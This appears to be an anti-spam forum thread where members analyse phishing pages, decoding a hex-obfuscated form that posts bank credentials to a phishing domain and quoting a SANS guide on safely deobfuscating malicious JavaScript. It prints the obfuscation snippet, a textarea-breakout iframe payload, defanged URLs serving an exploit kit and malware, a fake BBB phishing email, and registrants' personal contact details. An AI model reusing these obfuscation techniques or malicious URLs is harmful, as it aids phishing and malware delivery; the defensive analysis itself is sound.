What's this phish doing?


 [ 18 posts ]  Go to page 1, 2  Next
 PostPosted: Thu May 27, 2010 6:52 pm   
Spammer Killing Machine

Joined: Thu Apr 03, 2008 4:33 pm
Posts: 590
Location: Florida
Just what is this trying to do?

I searched through this code source 3 times and am not seeing what exactly they are trying to do; or if perhaps they "lost" the payload when they scripted it out? lol.....I mean, ain't like it hasn't happened before ;) In the Sloppy Criminals forum lol....

See pastebin at http://pastebay.com/100835 with plain text of "attachment source" within the following message:
http://www.spamcop.net/sc?id=z407525236 ... a1514993fz

I reported to Spamcop anyhow, since the message was originating from
Re: 213.25.179.100 (Administrator of network where email originates)

[email protected]

But just curious if anyone can see the payload? I found loads of bankofamerica "sitekey" hotlinks, but nothing pointing to a "hijacked" host of any sort....unless like I said, either
1) I overlooked it, or
2) they just forgot to include the payload for the "Continue" button....

_________________
SpamPoison


 PostPosted: Fri May 28, 2010 11:56 am   
Site Admin

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
The key is on line #148. It's a typical JavaScript obfuscation to hide the true location of where this form is going to post. Here's the output of that code:

Code:
<form action="http://www.pharmaquest.es/verify.php" method="post" name="frm" id="frm" onsubmit="return validate(this)">


If you visit that page without posting it, it does indeed redirect you to Chase Bank, which is what they're trying to allege they are. Visiting pharmaquest.es on its own shows the same parked page shown for many illicit sites including many rogue affiliate groups.

While trying to locate who set up hosting and domain registration, DNSSTUFF told me: Spain doesn't have a WHOIS server. Huh. News to me. Must be why they chose it.

Won't ping, won't whois. I have no info on this server, but now you know which domain to report.

SiL


 PostPosted: Sat May 29, 2010 8:43 am   
You are kiillllling-a my bizinisss!

Joined: Thu Mar 01, 2007 3:01 am
Posts: 5915
spamislame wrote:
While trying to locate who set up hosting and domain registration, DNSSTUFF told me: Spain doesn't have a WHOIS server. Huh. News to me. Must be why they chose it.


I found this one a while back:
http://www.esreg.com/whois.php

Quote:
Whois info for pharmaquest.es
Registration data

Domain: pharmaquest.es

Reg. date: 2009-01-23
Exp. date: 2011-01-23

Owner: Juan Carlos Gil Sanchez
Admin contact: wedge JCGS80-ESNIC-F4

Name: Juan Carlos Gil Sanchez
Organization:
Email: jcarlosgs@vodafone.es
Telephone:
Address:
City:
Province:
Postal Code:
Country:
Tech contact: wedge RIS78-ESNIC-F4

Name: RAN INTERNET S.L.
Organization:
Email: registros-es@ran.es
Telephone:
Address:
City:
Province:
Postal Code:
Country:
Billing contact: wedge

Information unavailable

Nameserver 1: ns2.ran.es
Nameserver 2: wintermute.ran.es

Registrar: Estrategias WebSite S.L.

From DNSstuff's point of view, they don't have a whois server. It's meant to be human-only. The CAPTCHA is brutal (full of O's and U's with no indication of whether they're supposed to be upper or lower case), and you have to click on tiny arrows to expand all the fields.


 PostPosted: Sun May 30, 2010 7:40 pm   
You are kiillllling-a my bizinisss!

Joined: Tue Jun 27, 2006 2:01 am
Posts: 9227
> whois pharmaquest.es
Quote:
This TLD has no whois server, but you can access the whois database at
https://www.nic.es/ingles/


Invalid security certificate:
Quote:
Technical details

http://www.nic.es uses an invalid security certificate.

The certificate is not trusted because the issuer certificate is not trusted.

(Error code: sec_error_untrusted_issuer)

Quote:
I Understand the Risks

If you understand what's going on, you
can tell Firefox to start trusting this site's identification.
Even if you trust the site, this error could mean that someone is
tampering with your connection.

Don't add an exception unless
you know there's a good reason why this site doesn't use trusted identification.

[Add Exception]
[Confirm security exception]

Now reload the site at https://www.nic.es/ingles/ but you end up at
https://www.nic.es/error.action?status=404

Dropping the /ingles, reload just https://www.nic.es/ and you end up at
https://www.nic.es/index.action

Click on [Welcome] because it's in English, and end up at the English page
https://www.nic.es/index.action?request_locale=en

At the Search box, key pharmaquest and click [Buscar]
Key the CAPTCHA and view the details. - as AC reported
Quote:
PERSONA DE CONTACTO ADMINISTRATIVO
Identificador JCGS80-ESNIC-F4
Nombre Juan Carlos Gil Sanchez
Email [email protected]

PERSONA DE CONTACTO TECNICO
Identificador RIS78-ESNIC-F4
Nombre RAN INTERNET S.L.
Email [email protected]


 PostPosted: Mon May 31, 2010 12:43 pm   
Spammer Killing Machine

Joined: Thu Apr 03, 2008 4:33 pm
Posts: 590
Location: Florida
Interesting, that's gotta be the first *.es domain I've seen I think.......not counting the typical "hijacked" redirection domains most commonly used by "phishers"...

How did you get that js decoded? Malzilla? Is there any "standalone" web-friendly way of decrypting it, without installing a "program" :)

_________________
SpamPoison


 PostPosted: Mon May 31, 2010 2:21 pm   
Site Admin

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
ahoier wrote:
Interesting, that's gotta be the first *.es domain I've seen I think.......not counting the typical "hijacked" redirection domains most commonly used by "phishers"...

Agreed.

ahoier wrote:
How did you get that js decoded? Malzilla? Is there any "standalone" web-friendly way of decrypting it, without installing a "program" :)

I write tons of JavaScript, so I modified it so it would output what it was doing in a way that wouldn't be interpreted by the browser. Often faster for me to do it that way. Malzilla never decodes that stuff. The particular method they used here is extremely commonplace.

Original line 148 (wrapped for legibility):

Code:
var i,y,x="3c666f726d20616374696f6e3d22687474703a2f2f7777772e706
861726d6171756573742e65732f7665726966792e70687022206d6574686
f643d22706f737422206e616d653d2266726d222069643d2266726d22206
f6e7375626d69743d2272657475726e2076616c696461746528746869732
9223e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.subst
r(i,2));}document.write(y);

Note that they just "document.write" that value once it's been de-obfuscated.

I instead go:
Code:
document.write("<textarea rows=10 cols=80>"+y+"</textarea>");

And that outputs it in a textarea. :)

SiL


 PostPosted: Thu Jun 03, 2010 9:22 pm   
Spammers' Nightmare

Joined: Thu Apr 12, 2007 6:55 pm
Posts: 2549
Taken from http://isc.sans.org/diary.html?storyid=2358
Quote:
Beware of </textarea>

Now, as the first method failed, you might want to try Tom Liston’s <textarea> method. First of all, I hope that you are aware that whenever you run code like this that you should do it in an isolated environment because you are running live, potentially malicious code. This is even more important in this case.

I’ll skip right to the point – when this program is deobfuscated, the result will be this:

</textarea><iframe src="http://[REMOVED]" width=1 height=1 style="border: 0px"></iframe>

What does this do? It closes the <textarea> tag that you might have put before. In other words, if you were running this in your browser and you used method 2) you would actually execute the malicious code! It is obvious that author of this code came prepared for analysts!

Next to method 3). In this case, method 3) isn’t really applicable as the deobfuscation code is way too complex to be rewritten in perl (if you really do it let me know).
So what are we left with? Method 4, or (my favourite), a debugger.

Defeating the obfuscation

One relatively easy way to deobfuscate this is to use SpiderMonkey, which is Mozilla’s JavaScript engine released as a standalone. It will not work just out of the box, though, as the JavaScript engine will not know what to do with document.write(), but folks at Websense wrote two nice JavaScript programs that you can use so you don’t have to replace any document.write() calls. Their method is explained at http://www.websense.com/securitylabs/bl ... ?BlogID=98, it’s a nice read that I definitely recommend.

I personally prefer to look at things with a debugger, though, so I’ll explain how to do this with Rhino. Rhino is Mozilla’s JavaScript debugger. It has a nice GUI and is written in Java, so it will work on any platform. You just must make sure that you have JRE installed.
A lot of users have problems starting it – you have to make sure that your Java classpath will be set to js.jar file that comes with Rhino, otherwise Java will not know how to find the class it needs. In the example below, I’ve extracted Rhino in the D:\Rhino directory and the malicious JavaScript file (with all HTML tags stripped out) is in d:\malware.js. Rhino should be started with the following command:

D:> java -classpath D:\Rhino\js.jar org.mozilla.javascript.tools.debugger.Main D:\malware.js

This will open a nice GUI window that is pretty much self explanatory. It is advised that you make the code human readable before this as that will allow you to set breakpoints easier – and as we’ve seen, in this case you can do it as the deobfuscation function will strip out white spaces.
You can now either step through the program, debug it and see how it works, or simply set a break point on the document.write() call and then inspect the I4D790 variable, as shown below:

See website for screen shot.....
Quote:
You can see that it contains the code that would have been executed in the browser.

As we saw, malware authors are definitely improving their work and are, almost certainly, aware of methods that analysts use. In this case, the </textarea> tag was directed against analysts, as it made no other sense in the rest of the code. Luckily, whatever has to run on your machine can be analyzed, but it will probably not be as easy to do that as it was in the past, as malware continues to evolve.

UPDATE

Couple of updates with good stuff we've received from our readers:

1) Peter wrote to correct me regarding the Tom Liston's textarea method. This method actually also modifies the function (by adding <textarea> and </textarea> tags before and after the document.write() function call) so it will also fail because of the endless while() loop. This is not directly related to thing that they close the <textarea> tag, but see 2).

2) Aaron sent us a nice function he uses to deobfuscate stuff. Basically, he replaces the document.write() call with a function he defines, called documentwrite. The function looks like this:

function documentwrite(txt){
    // Replace the first "textarea" in the output; if nothing changed there are none left
    txt0=txt.replace("textarea","apple")
    if(txt == txt0){
        document.write("<textarea rows=50 cols=50>");
        document.write(txt0);
        document.write("</textarea>");
    }
    else{
        // Still contained a "textarea": recurse on the partly replaced string
        txt1=txt.replace("textarea","apple")
        documentwrite(txt1)
    }
}

So he makes sure that the output will go in a textarea, even if there are nested </textarea> flags. In this case this might even work since the . from document.write() is removed anyway, so this will pass the self checking test this malware implements.

3) An anonymous reader wrote to tell that there might be some dependencies/problems with running Rhino on Linux, due to its Java implementation. Also, on Linux, the classpath parameter is called with "--classpath".


 PostPosted: Thu Jun 03, 2010 9:57 pm   
Site Admin

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
This is definitely a good warning, and makes it clear I miss a key piece, but I often am explaining this to people who generally are not aware of how to decrypt whatever the criminal is trying to do.

trobbins wrote:
Taken from http://isc.sans.org/diary.html?storyid=2358
Quote:
Beware of </textarea>

<snip>

I’ll skip right to the point – when this program is deobfuscated, the result will be this:

</textarea><iframe src="http://[REMOVED]" width=1 height=1 style="border: 0px"></iframe>


That would certainly be dangerous if I was taking that approach while trying to load that entire page. I never do that. I only ever look for the pieces which perform the obfuscation and load it into its own blank html file with my own JavaScript. The only code it executes is the one I put in place. It's a method I've been using for four years now, and it's been pretty useful. In fact I also have an ongoing log I keep every year (nerd) which tabulates most of the obfuscation techniques I see over time. They're all timestamped and completely commented out. This is so I can compare and contrast the changes in how they perform this obfuscation.

But also, fyi, in most of the cases I've seen that defense mechanism they're putting in there won't work either if the "textarea" tag is part of the encryption. It outputs the text itself as "escaped" html. It will still appear within my textarea.

e.g.:

Code:
// String.fromCharCode(60,13,47,116,101,120,116,97,114,101,97,62) builds "<", a carriage return, then "/textarea>"
document.write('<textarea rows=20 cols=60>'+String.fromCharCode(60,13,47,116,101,120,116,97,114,101,97,62)+'</textarea>');


That will work if you paste it inside some <script> tags. By that I mean it will still output the values within the textarea. You will see the html code they're trying to execute. But the script still has to interpret it, not execute it. I never use "eval", I use "document.write".

That's still good advice but I'd go a step further: Don't ever perform these steps from within the same full page which featured it. I think you'd have to be pretty insane to ever do that if you're a serious researcher of this stuff.

Thanks for posting that. That's definitely a very good warning. This is not for everyone. Also: there are other ways of exposing this code besides textarea tags.

SiL


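A static way of doing what SiL describes above (decoding the hex pairs from line 148 without ever handing the result to document.write or eval), combined with a check for the </textarea> breakout from the SANS diary that trobbins quoted. This is an added example, not code from the thread; decodeHexPairs() and summarize() are my own names, and it runs under Node.js.

```javascript
// Static decoder for the "%XX per two hex digits" obfuscation seen on line 148.
// It computes the same string as
//   for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}
// but never executes the decoded markup. Node.js only, no DOM required.

// The obfuscated string quoted in the thread, re-joined onto one value.
const SAMPLE_HEX =
  "3c666f726d20616374696f6e3d22687474703a2f2f7777772e706" +
  "861726d6171756573742e65732f7665726966792e70687022206d6574686" +
  "f643d22706f737422206e616d653d2266726d222069643d2266726d22206" +
  "f6e7375626d69743d2272657475726e2076616c696461746528746869732" +
  "9223e";

// Turn each two-digit hex pair into one character, as unescape('%XX') does.
// Refuses odd-length or non-hex input instead of silently emitting garbage.
function decodeHexPairs(hex) {
  if (hex.length % 2 !== 0 || !/^[0-9a-fA-F]*$/.test(hex)) {
    throw new Error("input is not an even-length hex string");
  }
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Report what an analyst wants from the decoded markup: where any form
// posts, any iframe sources, and whether the payload tries to close a
// <textarea> the analyst might have wrapped around it.
function summarize(markup) {
  const formActions = [];
  const iframeSources = [];
  const tagRe = /<(form|iframe)\b[^>]*\b(action|src)\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = tagRe.exec(markup)) !== null) {
    (m[1].toLowerCase() === "form" ? formActions : iframeSources).push(m[3]);
  }
  return {
    formActions,
    iframeSources,
    // "</textarea" with any whitespace inside the tag, as a browser would parse it.
    textareaBreakout: /<\s*\/\s*textarea/i.test(markup),
  };
}

const decoded = decodeHexPairs(SAMPLE_HEX);
console.log(decoded);
console.log(summarize(decoded));
```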
 PostPosted: Thu Mar 24, 2011 5:36 pm   
Spam Muncher

Joined: Wed Jan 03, 2007 10:19 am
Posts: 890
Location: North Britain
I got one today that purported to be from a German lawyer who wanted an out of court settlement for a load of MP3's I'd downloaded, the email included a range of obviously bogus details (including the infringing IP address) in German and directed me to the payment site. http://www.rechtsanwalt-olaf-kaltbrenne ... 502384.ru/ I have no idea where it went or is hosted as that URL looks inconclusively meaningful to me and this sort of thing is usually derivable.

_________________
Ruffian antics are a wrench in society's gears


 PostPosted: Thu Mar 24, 2011 6:49 pm   
You are kiillllling-a my bizinisss!

Joined: Thu Mar 01, 2007 3:01 am
Posts: 5915
I'm seeing other people report that:
http://isc.sans.edu/diary.html?storyid=8497

Since there are real firms that have a niche business strongarming people that way, it's not a surprise that it's hard for people to know which are real.


 PostPosted: Fri Dec 09, 2011 2:04 pm   
Spam Muncher

Joined: Wed Jan 03, 2007 10:19 am
Posts: 890
Location: North Britain
Got sent this one today as a financial PHISH from 'your bank' - httq://wonderfulwrench.com/main.php?pag ... ca118fcb8c . I don't know what it was trying to do as it crashed every browser apart from Safari that I tried, and in that it prompted a frantic rustling from the hard drive and no other clues.

_________________
Ruffian antics are a wrench in society's gears


Last edited by Benzyl on Fri Dec 09, 2011 4:48 pm, edited 1 time in total.

 PostPosted: Fri Dec 09, 2011 3:48 pm   
Spammer Killing Machine

Joined: Sun Jun 13, 2010 5:22 pm
Posts: 528
wonderfulwrench.com is a newly registered domain which has already been suspended (status: clientHold) by its registrar ENOM, INC

According to a web search, the domain had been hosted at IP 46.45.137.205 on Safya Net in Turkey where the malicious web pages are still running. Using an anonymous web proxy with high levels of protections, when I view
hXXp://46.45.137.205/main.php?page=977334ca118fcb8c
I see
"Please wait page is loading..."
Additionally,
hXXp://46.45.137.205/w.php?f=52&e=2
pushes a malicious file about.exe
See:
http://www.virustotal.com/file-scan/report.html?id=68d22675c6c9b8c9fd43781f5ad0ab9f34778174ee12eb22dc1bfc1935c34496-1323461551


 PostPosted: Fri Dec 09, 2011 6:23 pm   
Spammers' Nightmare

Joined: Thu Apr 05, 2007 4:10 pm
Posts: 2777
That IP, 46.45.137.205, doesn't ping for me or pull up content. Maybe offline? - Because of a Spamhaus SBL on the /24? - Hmm, :?

http://www.spamhaus.org/sbl/sbl.lasso?query=SBL123560

Code:
Ref: SBL123560
46.45.137.0/24 is listed on the Spamhaus Block List (SBL)

09-Dec-2011 16:09 GMT | SR04
Cybercriminal spammer hosting

Update Dec 09, 2011

Blackhole exploit kit hosted here:
hXXp://wonderfulwrench.com/main.php?page=111d937ec38dd17e

$ dig +short wonderfulwrench.com
46.45.137.205
_____________

46.45.137.206/32
Live rh.com.tr SR29
2011-12-08 16:55:14
SBL123508 Blackhole exploit kit @46.45.137.206

_______________________
http://sucabikes.com.ar/bcab6a/index.html
>>> http://combijump.com/main.php?page=111d937ec38dd17e


_______________________

Domain Name: COMBIJUMP.COM
Registrar: 0101 INTERNET, INC.
Whois Server: whois.0101domain.com
Referral URL: http://www.0101domain.com
Name Server: 0101DOMAIN1.EARTH.ORDERBOX-DNS.COM
Name Server: 0101DOMAIN1.MARS.ORDERBOX-DNS.COM
Name Server: 0101DOMAIN1.MERCURY.ORDERBOX-DNS.COM
Name Server: 0101DOMAIN1.VENUS.ORDERBOX-DNS.COM
Status: clientTransferProhibited
Updated Date: 07-dec-2011
Creation Date: 04-dec-2011
Expiration Date: 04-dec-2012


Registration Service Provided By: 0101DOMAIN
Contact: +852.29180101

Domain Name: COMBIJUMP.COM

Registrant:
n/a
Lowell Runholt ([email protected])
2282 Caminito Pajarito #154
San Diego
California,92107
US
Tel. +1.6192229960

Creation Date: 04-Dec-2011
Expiration Date: 04-Dec-2012

Domain servers in listed order:
0101domain1.earth.orderbox-dns.com
0101domain1.mars.orderbox-dns.com
0101domain1.mercury.orderbox-dns.com
0101domain1.venus.orderbox-dns.com


Administrative Contact:
n/a
Lowell Runholt ([email protected])
2282 Caminito Pajarito #154
San Diego
California,92107
US
Tel. +1.6192229960

Technical Contact:
n/a
Lowell Runholt ([email protected])
2282 Caminito Pajarito #154
San Diego
California,92107
US
Tel. +1.6192229960

Billing Contact:
n/a
Lowell Runholt ([email protected])
2282 Caminito Pajarito #154
San Diego
California,92107
US
Tel. +1.6192229960

Status:LOCKED


_______

Received: from client178-64.wireless.umu.se ([130.239.178.64]:4150)
byxxxxx; Thu, 08 Dec 2011 08:41:28 +0000
Received: from apache by bbb.org with local (Exim 4.63)
(envelope-from <[email protected]>)
id QIWCQO-US4KQD-NK
for xxxxx; Thu, 8 Dec 2011 09:41:27 +0100
To: xxxxxxxx
Subject: Complaint from your customers
Date: Thu, 8 Dec 2011 09:41:27 +0100
From: "::Better Business Bureau::" <[email protected]>
Message-ID: <[email protected]>
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="------------01070900204060702040305"


Attn: Owner/Manager
The Better Business Bureau has got the above mentioned complaint from one of your clients concerning their dealings with you.
The detailed information about the consumer's concern is included in attached file.
Please give attention to this problem and let us know about your standpoint.
We kindly ask you to click here to answer this complaint.

We look forward to your prompt attention to this matter.

Sincerely yours,
Louis Gerald
Better Business Bureau




Council of Better Business Bureaus
4200 Wilson Blvd, Suite 800
Arlington, VA 22203-1838
Phone: 1 (703) 276.0100
Fax: 1 (703) 525.8277


 PostPosted: Fri Dec 09, 2011 8:03 pm   
You are kiillllling-a my bizinisss!

Joined: Tue Jun 27, 2006 2:01 am
Posts: 9227
Confirming

Domain Name: WONDERFULWRENCH.COM
Registrar: ENOM, INC.
Status: clientHold
Status: clientTransferProhibited
Updated Date: 09-dec-2011
Creation Date: 05-dec-2011


 PostPosted: Fri Jan 20, 2012 6:18 pm   
Spammer Exterminator

Joined: Wed May 02, 2007 8:59 pm
Posts: 1055
Another, more difficult quiz: what is this phish doing?

http://www.spamcop.net/sc?id=z522915344 ... on=display

I saw only links to the real poste.it bank web site; the little script inside doesn't seem to redirect anywhere, and there is no POST tag.
So what?

